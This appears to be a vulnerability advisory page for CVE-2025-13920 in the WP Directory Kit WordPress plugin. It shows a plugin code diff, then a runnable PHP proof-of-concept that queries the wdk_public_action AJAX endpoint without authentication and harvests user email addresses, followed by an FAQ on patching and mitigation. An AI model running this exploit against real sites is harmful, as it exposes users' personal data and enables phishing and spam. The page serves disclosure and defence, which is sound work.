+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=lifetime" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
         </div>
     </div>
-
+
+
     <div class="text-center">
-        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit');?></a>
+        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit'); ?></a>
     </div>
 </div>


 <script>
-jQuery(document).ready(function($) {
+    jQuery(document).ready(function($) {

-})
+    })
 </script>

 <style>
-
-img.presentation-image
-{
-    max-width:600px;
-    max-height:600px;
-}
-
-h2
-{
-    font-size: 25px;
-    color: #010b44;
-}
-
-p.presentation-desc
-{
-    padding:5px 0px;
-    margin:0px;
-    font-size: 18px;
-}
-
-a.image-link
-{
-    display: inline-block;
-    border: 3px solid white;
-}
-
-a.image-link:hover
-{
-    border: 3px solid #506690;
-}
-
+    img.presentation-image {
+        max-width: 600px;
+        max-height: 600px;
+    }
+
+    h2 {
+        font-size: 25px;
+        color: #010b44;
+    }
+
+    p.presentation-desc {
+        padding: 5px 0px;
+        margin: 0px;
+        font-size: 18px;
+    }
+
+    a.image-link {
+        display: inline-block;
+        border: 3px solid white;
+    }
+
+    a.image-link:hover {
+        border: 3px solid #506690;
+    }
 </style>

 <?php $this->view('general/footer', $data); ?>
 No newline at end of file
--- a/wpdirectorykit/application/views/wdk_addons_membership/index.php
+++ b/wpdirectorykit/application/views/wdk_addons_membership/index.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * The template for Memberhsip presentation.
  *
@@ -6,8 +7,8 @@
  *
  */

-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
+if (! defined('ABSPATH')) {
+    exit; // Exit if accessed directly.
 }
 ?>
 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
@@ -39,7 +40,6 @@
     <div class="wdk-pricing">
         <div class="wdk-sec-header">
             <h2 class="wdk-sec-title">
-                <span class="mark up"><?php echo esc_html__('SAVE MONEY!', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('Get all', 'wpdirectorykit'); ?>
                 <span class="mark"><?php echo esc_html__('addons and premium', 'wpdirectorykit'); ?></span>
                 <?php echo esc_html__('support from 8.25$/month in yearly subscription', 'wpdirectorykit'); ?>
@@ -50,7 +50,7 @@
                 <div class="wdk-pac">
                     <div class="header">
                         <h4><?php echo esc_html__('Starter', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>19<span class="after"></span></span></div>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>19.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -60,31 +60,31 @@
                         <li class="item"><?php echo esc_html__('1 month Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 month Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?monthly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=monthly" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac featured">
                     <div class="header">
-                        <h4><?php echo esc_html__('Serious', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>49<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>99.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
                         <li class="item"><?php echo esc_html__('All Our Themes', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('3 months Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?quarterly=true" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/" class="btn btn-primary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
             <div class="wdk-col-md-4">
                 <div class="wdk-pac">
                     <div class="header">
-                        <h4><?php echo esc_html__('Pro', 'wpdirectorykit'); ?></h4>
-                        <div class="pricing-value"><span class="price"><span class="before">$</span>99<span class="after"></span></span></div>
+                        <h4><?php echo esc_html__('Lifetime', 'wpdirectorykit'); ?></h4>
+                        <div class="pricing-value"><span class="price"><span class="before">$</span>199.99<span class="after"></span></span></div>
                         <p><?php echo esc_html__('Include all functionalities for single website installation', 'wpdirectorykit'); ?></p>
                     </div>
                     <ul class="list-items">
@@ -92,58 +92,52 @@
                         <li class="item"><?php echo esc_html__('All Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('All Upcoming Addons', 'wpdirectorykit'); ?></li>
                         <li class="item"><?php echo esc_html__('1 year Chat Support (Telegram)', 'wpdirectorykit'); ?></li>
-                        <li class="item"><?php echo esc_html__('1 year Updates', 'wpdirectorykit'); ?></li>
+                        <li class="item"><?php echo esc_html__('Lifetime Updates', 'wpdirectorykit'); ?></li>
                     </ul>
-                    <div class="wdk-pac-footer"><a target="_blank" href="https://swit.gumroad.com/l/wp-directory-kit-addons?yearly=true" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
+                    <div class="wdk-pac-footer"><a target="_blank" href="https://checkout.freemius.com/plugin/22296/plan/37315/?billing_cycle=lifetime" class="btn btn-outline-secondary"><?php echo esc_html__('Buy now', 'wpdirectorykit'); ?></a></div>
                 </div>
             </div>
         </div>
     </div>
-
+
+
     <div class="text-center">
-        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit');?></a>
+        <a href="https://wpdirectorykit.com/plugins.html" class="button button-primary xl" target="_blank"><?php echo esc_html__('More Plugins', 'wpdirectorykit'); ?></a>
     </div>
 </div>


 <script>
-jQuery(document).ready(function($) {
+    jQuery(document).ready(function($) {

-})
+    })
 </script>

 <style>
-
-img.presentation-image
-{
-    max-width:600px;
-    max-height:600px;
-}
-
-h2
-{
-    font-size: 25px;
-    color: #010b44;
-}
-
-p.presentation-desc
-{
-    padding:5px 0px;
-    margin:0px;
-    font-size: 18px;
-}
-
-a.image-link
-{
-    display: inline-block;
-    border: 3px solid white;
-}
-
-a.image-link:hover
-{
-    border: 3px solid #506690;
-}
-
+    img.presentation-image {
+        max-width: 600px;
+        max-height: 600px;
+    }
+
+    h2 {
+        font-size: 25px;
+        color: #010b44;
+    }
+
+    p.presentation-desc {
+        padding: 5px 0px;
+        margin: 0px;
+        font-size: 18px;
+    }
+
+    a.image-link {
+        display: inline-block;
+        border: 3px solid white;
+    }
+
+    a.image-link:hover {
+        border: 3px solid #506690;
+    }
 </style>

 <?php $this->view('general/footer', $data); ?>
 No newline at end of file
--- a/wpdirectorykit/premium_functions.php
+++ b/wpdirectorykit/premium_functions.php
@@ -0,0 +1,46 @@
+<?php
+
+if (! defined('WPINC')) {
+    die;
+}
+
+//'anonymous_mode' => true,
+
+
+if (! function_exists('wdk_fs')) {
+    // Create a helper function for easy SDK access.
+    function wdk_fs()
+    {
+        global $wdk_fs;
+
+        if (! isset($wdk_fs)) {
+            // Include Freemius SDK.
+            require_once dirname(__FILE__) . '/vendor/freemius/start.php';
+
+            $wdk_fs = fs_dynamic_init(array(
+                'id'                  => '10131',
+                'slug'                => 'wpdirectorykit',
+                'premium_slug'        => 'wdk-pro',
+                'type'                => 'plugin',
+                'public_key'          => 'pk_024925d617beb399759247d65ac26',
+                'is_premium'          => false,
+                'has_addons'          => true,
+                'has_paid_plans'      => false,
+                'menu'                => array(
+                    'slug'           => 'wdk',
+                    'contact'        => false,
+                    'support'        => false,
+                    'addons'         => false,
+                ),
+                'anonymous_mode' => true,
+            ));
+        }
+
+        return $wdk_fs;
+    }
+
+    // Init Freemius.
+    wdk_fs();
+    // Signal that SDK was initiated.
+    do_action('wdk_fs_loaded');
+}
--- a/wpdirectorykit/tgm-pa/class-tgm-plugin-activation.php
+++ b/wpdirectorykit/tgm-pa/class-tgm-plugin-activation.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * Plugin installation and activation for WordPress themes.
  *
@@ -32,2127 +33,2189 @@
 	Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

-if ( ! class_exists( 'TGM_Plugin_Activation' ) ) {
+if (! class_exists('TGM_Plugin_Activation')) {

-	/**
-	 * Automatic plugin installation and activation library.
-	 *
-	 * Creates a way to automatically install and activate plugins from within themes.
-	 * The plugins can be either bundled, downloaded from the WordPress
-	 * Plugin Repository or downloaded from another external source.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @package TGM-Plugin-Activation
-	 * @author  Thomas Griffin
-	 * @author  Gary Jones
-	 */
-	class TGM_Plugin_Activation {
-		/**
-		 * TGMPA version number.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @const string Version number.
-		 */
-		const TGMPA_VERSION = '2.6.1';
-
-		/**
-		 * Regular expression to test if a URL is a WP plugin repo URL.
-		 *
-		 * @const string Regex.
-		 *
-		 * @since 2.5.0
-		 */
-		const WP_REPO_REGEX = '|^http[s]?://wordpress.org/(?:extend/)?plugins/|';
-
-		/**
-		 * Arbitrary regular expression to test if a string starts with a URL.
-		 *
-		 * @const string Regex.
-		 *
-		 * @since 2.5.0
-		 */
-		const IS_URL_REGEX = '|^http[s]?://|';
-
-		/**
-		 * Holds a copy of itself, so it can be referenced by the class name.
-		 *
-		 * @since 1.0.0
-		 *
-		 * @var TGM_Plugin_Activation
-		 */
-		public static $instance;
-
-		/**
-		 * Holds arrays of plugin details.
-		 *
-		 * @since 1.0.0
-		 * @since 2.5.0 the array has the plugin slug as an associative key.
-		 *
-		 * @var array
-		 */
-		public $plugins = array();
-
-		/**
-		 * Holds arrays of plugin names to use to sort the plugins array.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var array
-		 */
-		protected $sort_order = array();
-
-		/**
-		 * Whether any plugins have the 'force_activation' setting set to true.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var bool
-		 */
-		protected $has_forced_activation = false;
-
-		/**
-		 * Whether any plugins have the 'force_deactivation' setting set to true.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var bool
-		 */
-		protected $has_forced_deactivation = false;
-
-		/**
-		 * Name of the unique ID to hash notices.
-		 *
-		 * @since 2.4.0
-		 *
-		 * @var string
-		 */
-		public $id = 'wpdirectorykit';
-
-		/**
-		 * Name of the query-string argument for the admin page.
-		 *
-		 * @since 1.0.0
-		 *
-		 * @var string
-		 */
-		protected $menu = 'tgmpa-install-plugins';
-
-		/**
-		 * Parent menu file slug.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var string
-		 */
-		public $parent_slug = 'themes.php';
-
-		/**
-		 * Capability needed to view the plugin installation menu item.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var string
-		 */
-		public $capability = 'edit_theme_options';
-
-		/**
-		 * Default absolute path to folder containing bundled plugin zip files.
-		 *
-		 * @since 2.0.0
-		 *
-		 * @var string Absolute path prefix to zip file location for bundled plugins. Default is empty string.
-		 */
-		public $default_path = '';
-
-		/**
-		 * Flag to show admin notices or not.
-		 *
-		 * @since 2.1.0
-		 *
-		 * @var boolean
-		 */
-		public $has_notices = true;
-
-		/**
-		 * Flag to determine if the user can dismiss the notice nag.
-		 *
-		 * @since 2.4.0
-		 *
-		 * @var boolean
-		 */
-		public $dismissable = true;
-
-		/**
-		 * Message to be output above nag notice if dismissable is false.
-		 *
-		 * @since 2.4.0
-		 *
-		 * @var string
-		 */
-		public $dismiss_msg = '';
-
-		/**
-		 * Flag to set automatic activation of plugins. Off by default.
-		 *
-		 * @since 2.2.0
-		 *
-		 * @var boolean
-		 */
-		public $is_automatic = false;
-
-		/**
-		 * Optional message to display before the plugins table.
-		 *
-		 * @since 2.2.0
-		 *
-		 * @var string Message filtered by wp_kses_post(). Default is empty string.
-		 */
-		public $message = '';
-
-		/**
-		 * Holds configurable array of strings.
-		 *
-		 * Default values are added in the constructor.
-		 *
-		 * @since 2.0.0
-		 *
-		 * @var array
-		 */
-		public $strings = array();
-
-		/**
-		 * Holds the version of WordPress.
-		 *
-		 * @since 2.4.0
-		 *
-		 * @var int
-		 */
-		public $wp_version;
-
-		/**
-		 * Holds the hook name for the admin page.
-		 *
-		 * @since 2.5.0
-		 *
-		 * @var string
-		 */
-		public $page_hook;
-
-		/**
-		 * Adds a reference of this object to $instance, populates default strings,
-		 * does the tgmpa_init action hook, and hooks in the interactions to init.
-		 *
-		 * {@internal This method should be `protected`, but as too many TGMPA implementations
-		 * haven't upgraded beyond v2.3.6 yet, this gives backward compatibility issues.
-		 * Reverted back to public for the time being.}}
-		 *
-		 * @since 1.0.0
-		 *
-		 * @see TGM_Plugin_Activation::init()
-		 */
-		public function __construct() {
-			// Set the current WordPress version.
-			$this->wp_version = $GLOBALS['wp_version'];
+    /**
+     * Automatic plugin installation and activation library.
+     *
+     * Creates a way to automatically install and activate plugins from within themes.
+     * The plugins can be either bundled, downloaded from the WordPress
+     * Plugin Repository or downloaded from another external source.
+     *
+     * @since 1.0.0
+     *
+     * @package TGM-Plugin-Activation
+     * @author  Thomas Griffin
+     * @author  Gary Jones
+     */
+    class TGM_Plugin_Activation
+    {
+        /**
+         * TGMPA version number.
+         *
+         * @since 2.5.0
+         *
+         * @const string Version number.
+         */
+        const TGMPA_VERSION = '2.6.1';
+
+        /**
+         * Regular expression to test if a URL is a WP plugin repo URL.
+         *
+         * @const string Regex.
+         *
+         * @since 2.5.0
+         */
+        const WP_REPO_REGEX = '|^http[s]?://wordpress.org/(?:extend/)?plugins/|';
+
+        /**
+         * Arbitrary regular expression to test if a string starts with a URL.
+         *
+         * @const string Regex.
+         *
+         * @since 2.5.0
+         */
+        const IS_URL_REGEX = '|^http[s]?://|';
+
+        /**
+         * Holds a copy of itself, so it can be referenced by the class name.
+         *
+         * @since 1.0.0
+         *
+         * @var TGM_Plugin_Activation
+         */
+        public static $instance;
+
+        /**
+         * Holds arrays of plugin details.
+         *
+         * @since 1.0.0
+         * @since 2.5.0 the array has the plugin slug as an associative key.
+         *
+         * @var array
+         */
+        public $plugins = array();
+
+        /**
+         * Holds arrays of plugin names to use to sort the plugins array.
+         *
+         * @since 2.5.0
+         *
+         * @var array
+         */
+        protected $sort_order = array();
+
+        /**
+         * Whether any plugins have the 'force_activation' setting set to true.
+         *
+         * @since 2.5.0
+         *
+         * @var bool
+         */
+        protected $has_forced_activation = false;
+
+        /**
+         * Whether any plugins have the 'force_deactivation' setting set to true.
+         *
+         * @since 2.5.0
+         *
+         * @var bool
+         */
+        protected $has_forced_deactivation = false;
+
+        /**
+         * Name of the unique ID to hash notices.
+         *
+         * @since 2.4.0
+         *
+         * @var string
+         */
+        public $id = 'wpdirectorykit';
+
+        /**
+         * Name of the query-string argument for the admin page.
+         *
+         * @since 1.0.0
+         *
+         * @var string
+         */
+        protected $menu = 'tgmpa-install-plugins';
+
+        /**
+         * Parent menu file slug.
+         *
+         * @since 2.5.0
+         *
+         * @var string
+         */
+        public $parent_slug = 'themes.php';
+
+        /**
+         * Capability needed to view the plugin installation menu item.
+         *
+         * @since 2.5.0
+         *
+         * @var string
+         */
+        public $capability = 'edit_theme_options';
+
+        /**
+         * Default absolute path to folder containing bundled plugin zip files.
+         *
+         * @since 2.0.0
+         *
+         * @var string Absolute path prefix to zip file location for bundled plugins. Default is empty string.
+         */
+        public $default_path = '';
+
+        /**
+         * Flag to show admin notices or not.
+         *
+         * @since 2.1.0
+         *
+         * @var boolean
+         */
+        public $has_notices = true;
+
+        /**
+         * Flag to determine if the user can dismiss the notice nag.
+         *
+         * @since 2.4.0
+         *
+         * @var boolean
+         */
+        public $dismissable = true;
+
+        /**
+         * Message to be output above nag notice if dismissable is false.
+         *
+         * @since 2.4.0
+         *
+         * @var string
+         */
+        public $dismiss_msg = '';
+
+        /**
+         * Flag to set automatic activation of plugins. Off by default.
+         *
+         * @since 2.2.0
+         *
+         * @var boolean
+         */
+        public $is_automatic = false;
+
+        /**
+         * Optional message to display before the plugins table.
+         *
+         * @since 2.2.0
+         *
+         * @var string Message filtered by wp_kses_post(). Default is empty string.
+         */
+        public $message = '';
+
+        /**
+         * Holds configurable array of strings.
+         *
+         * Default values are added in the constructor.
+         *
+         * @since 2.0.0
+         *
+         * @var array
+         */
+        public $strings = array();
+
+        /**
+         * Holds the version of WordPress.
+         *
+         * @since 2.4.0
+         *
+         * @var int
+         */
+        public $wp_version;
+
+        /**
+         * Holds the hook name for the admin page.
+         *
+         * @since 2.5.0
+         *
+         * @var string
+         */
+        public $page_hook;
+
+        /**
+         * Adds a reference of this object to $instance, populates default strings,
+         * does the tgmpa_init action hook, and hooks in the interactions to init.
+         *
+         * {@internal This method should be `protected`, but as too many TGMPA implementations
+         * haven't upgraded beyond v2.3.6 yet, this gives backward compatibility issues.
+         * Reverted back to public for the time being.}}
+         *
+         * @since 1.0.0
+         *
+         * @see TGM_Plugin_Activation::init()
+         */
+        public function __construct()
+        {
+            // Set the current WordPress version.
+            $this->wp_version = $GLOBALS['wp_version'];

-			// Announce that the class is ready, and pass the object (for advanced use).
-			do_action_ref_array( 'tgmpa_init', array( $this ) );
+            // Announce that the class is ready, and pass the object (for advanced use).
+            do_action_ref_array('tgmpa_init', array($this));

-			/*
+            /*
 			 * Load our text domain and allow for overloading the fall-back file.
 			 *
 			 * {@internal IMPORTANT! If this code changes, review the regex in the custom TGMPA
 			 * generator on the website.}}
 			 */
-			add_action( 'init', array( $this, 'load_textdomain' ), 5 );
-			add_filter( 'load_textdomain_mofile', array( $this, 'overload_textdomain_mofile' ), 10, 2 );
-
-			// When the rest of WP has loaded, kick-start the rest of the class.
-			add_action( 'init', array( $this, 'init' ) );
-		}
-
-		/**
-		 * Magic method to (not) set protected properties from outside of this class.
-		 *
-		 * {@internal hackedihack... There is a serious bug in v2.3.2 - 2.3.6  where the `menu` property
-		 * is being assigned rather than tested in a conditional, effectively rendering it useless.
-		 * This 'hack' prevents this from happening.}}
-		 *
-		 * @see https://github.com/TGMPA/TGM-Plugin-Activation/blob/2.3.6/tgm-plugin-activation/class-tgm-plugin-activation.php#L1593
-		 *
-		 * @since 2.5.2
-		 *
-		 * @param string $name  Name of an inaccessible property.
-		 * @param mixed  $value Value to assign to the property.
-		 * @return void  Silently fail to set the property when this is tried from outside of this class context.
-		 *               (Inside this class context, the __set() method if not used as there is direct access.)
-		 */
-		public function __set( $name, $value ) {
-			return;
-		}
-
-		/**
-		 * Magic method to get the value of a protected property outside of this class context.
-		 *
-		 * @since 2.5.2
-		 *
-		 * @param string $name Name of an inaccessible property.
-		 * @return mixed The property value.
-		 */
-		public function __get( $name ) {
-			return $this->{$name};
-		}
-
-		/**
-		 * Initialise the interactions between this class and WordPress.
-		 *
-		 * Hooks in three new methods for the class: admin_menu, notices and styles.
-		 *
-		 * @since 2.0.0
-		 *
-		 * @see TGM_Plugin_Activation::admin_menu()
-		 * @see TGM_Plugin_Activation::notices()
-		 * @see TGM_Plugin_Activation::styles()
-		 */
-		public function init() {
-			/**
-			 * By default TGMPA only loads on the WP back-end and not in an Ajax call. Using this filter
-			 * you can overrule that behaviour.
-			 *
-			 * @since 2.5.0
-			 *
-			 * @param bool $load Whether or not TGMPA should load.
-			 *                   Defaults to the return of `is_admin() && ! defined( 'DOING_AJAX' )`.
-			 */
-			if ( true !== apply_filters( 'tgmpa_load', ( is_admin() && ! defined( 'DOING_AJAX' ) ) ) ) {
-				return;
-			}
-
-			// Load class strings.
-			$this->strings = array(
-				'page_title'                      => __( 'Install Required Plugins', 'wpdirectorykit' ),
-				'menu_title'                      => __( 'Install Plugins', 'wpdirectorykit' ),
-				/* translators: %s: plugin name. */
-				'installing'                      => __( 'Installing Plugin: %s', 'wpdirectorykit' ),
-				/* translators: %s: plugin name. */
-				'updating'                        => __( 'Updating Plugin: %s', 'wpdirectorykit' ),
-				'oops'                            => __( 'Something went wrong with the plugin API.', 'wpdirectorykit' ),
-				'notice_can_install_required'     => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'This plugin requires the following plugin: %1$s.',
-					'This plugin requires the following plugins: %1$s.',
-					'wpdirectorykit'
-				),
-				'notice_can_install_recommended'  => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'This plugin recommends the following plugin: %1$s.',
-					'This plugin recommends the following plugins: %1$s.',
-					'wpdirectorykit'
-				),
-				'notice_ask_to_update'            => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this plugin: %1$s.',
-					'The following plugins need to be updated to their latest version to ensure maximum compatibility with this plugin: %1$s.',
-					'wpdirectorykit'
-				),
-				'notice_ask_to_update_maybe'      => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'There is an update available for: %1$s.',
-					'There are updates available for the following plugins: %1$s.',
-					'wpdirectorykit'
-				),
-				'notice_can_activate_required'    => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'The following required plugin is currently inactive: %1$s.',
-					'The following required plugins are currently inactive: %1$s.',
-					'wpdirectorykit'
-				),
-				'notice_can_activate_recommended' => _n_noop(
-					/* translators: 1: plugin name(s). */
-					'The following recommended plugin is currently inactive: %1$s.',
-					'The following recommended plugins are currently inactive: %1$s.',
-					'wpdirectorykit'
-				),
-				'install_link'                    => _n_noop(
-					'Begin installing plugin',
-					'Begin installing plugins',
-					'wpdirectorykit'
-				),
-				'update_link'                     => _n_noop(
-					'Begin updating plugin',
-					'Begin updating plugins',
-					'wpdirectorykit'
-				),
-				'activate_link'

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13920 - WP Directory Kit <= 1.4.9 - Unauthenticated Email Exposure via wdk_public_action

<?php
/**
 * Proof of Concept for CVE-2025-13920
 * Unauthenticated Email Exposure in WP Directory Kit plugin
 *
 * Usage: php poc.php --url https://target.site
 */

$target_url = 'https://target.site';

// Parse command line arguments
if ($argc > 1 && $argv[1] === '--url') {
    if (isset($argv[2])) {
        $target_url = rtrim($argv[2], '/');
    } else {
        echo "Usage: php poc.php --url https://target.siten";
        exit(1);
    }
}

$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Craft the exploit payload
$post_data = [
    'action' => 'wdk_public_action',
    // Additional parameters needed to trigger the user query path
    // These parameters vary based on plugin configuration but typically include:
    'type' => 'search_users',
    'term' => '',  // Empty term returns all users
    'table' => 'users',
    'attr_id' => 'ID',
    'field_id' => 'user_email'
];

echo "[+] Target: $ajax_urln";
echo "[+] Sending exploit request...n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo "[-] cURL Error: " . curl_error($ch) . "n";
    curl_close($ch);
    exit(1);
}

curl_close($ch);

echo "[+] HTTP Response Code: $http_coden";

if ($http_code === 200 && !empty($response)) {
    echo "[+] Potential email addresses found in response:n";
    echo "----------------------------------------n";
    echo $response . "n";
    echo "----------------------------------------n";
    
    // Extract email patterns from response
    if (preg_match_all('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]{2,}/', $response, $matches)) {
        echo "[+] Extracted " . count($matches[0]) . " email addresses:n";
        foreach (array_unique($matches[0]) as $email) {
            echo "  - $emailn";
        }
    } else {
        echo "[-] No email patterns found in response.n";
        echo "[-] The response may contain encoded data or the plugin may not be vulnerable.n";
    }
} else {
    echo "[-] Request failed or returned empty response.n";
    echo "[-] The plugin may not be installed, updated, or configured differently.n";
}

?>

Frequently Asked Questions

What is CVE-2025-13920?
Understanding the Vulnerability
CVE-2025-13920 is a medium severity vulnerability in the WP Directory Kit plugin for WordPress, affecting versions up to 1.4.9. It allows unauthenticated attackers to extract email addresses of users with specific roles through the wdk_public_action AJAX handler.
How does this vulnerability work?
Mechanism of Exploitation
The vulnerability exists because the AJAX handler does not require user authentication before executing queries that expose email addresses. Attackers can send crafted requests to the AJAX endpoint to retrieve user data, including email addresses, by manipulating the request parameters.
Who is affected by this vulnerability?
Identifying Vulnerable Users
All users of the WP Directory Kit plugin who are running versions 1.4.9 or earlier are affected. This includes any WordPress site utilizing this plugin, particularly those with users that have Directory Kit-specific roles.
How can I check if my site is vulnerable?
Assessing Your Installation
To check if your site is vulnerable, verify the version of the WP Directory Kit plugin installed. If it is version 1.4.9 or earlier, your site is at risk. Additionally, you can review the AJAX requests to see if sensitive user data can be accessed without authentication.
How can I fix this vulnerability?
Applying the Patch
To mitigate this vulnerability, update the WP Directory Kit plugin to version 1.5.0 or later, which contains the necessary patch. The patch removes the code responsible for exposing email addresses, thereby eliminating the risk of unauthorized access.
What does the CVSS score of 5.3 indicate?
Understanding Severity Ratings
The CVSS score of 5.3 indicates a medium level of severity for this vulnerability. This means that while exploitation is possible, it requires certain conditions to be met, such as the attacker being able to send crafted requests to the server.
What practical risks does this vulnerability pose?
Potential Consequences of Exploitation
The main risk is the exposure of user email addresses, which can lead to targeted phishing attacks, spam, and social engineering attempts. While it does not allow for direct system compromise, the privacy violation could have regulatory implications under laws like GDPR.
What is the proof of concept for this vulnerability?
Demonstrating the Exploit
The proof of concept is a PHP script that demonstrates how an attacker can exploit the vulnerability. It shows how to send a crafted request to the vulnerable AJAX endpoint to retrieve user email addresses without authentication, highlighting the ease of exploitation.
What changes were made in the patch?
Details of the Code Update
The patch for CVE-2025-13920 comments out the lines of code that appended email addresses to the response based on user capabilities. This prevents email addresses from being included in any AJAX responses, effectively mitigating the exposure risk.
Is there a way to further secure my site beyond the patch?
Additional Security Measures
In addition to applying the patch, consider implementing security measures such as limiting AJAX access to authenticated users, monitoring user roles and permissions, and regularly updating all plugins to their latest versions to reduce vulnerabilities.
What should I do if I cannot update the plugin immediately?
Interim Mitigation Strategies
If you cannot update the plugin immediately, consider disabling the WP Directory Kit plugin temporarily to prevent exploitation. Additionally, review server logs for any unusual AJAX requests that may indicate attempts to exploit the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations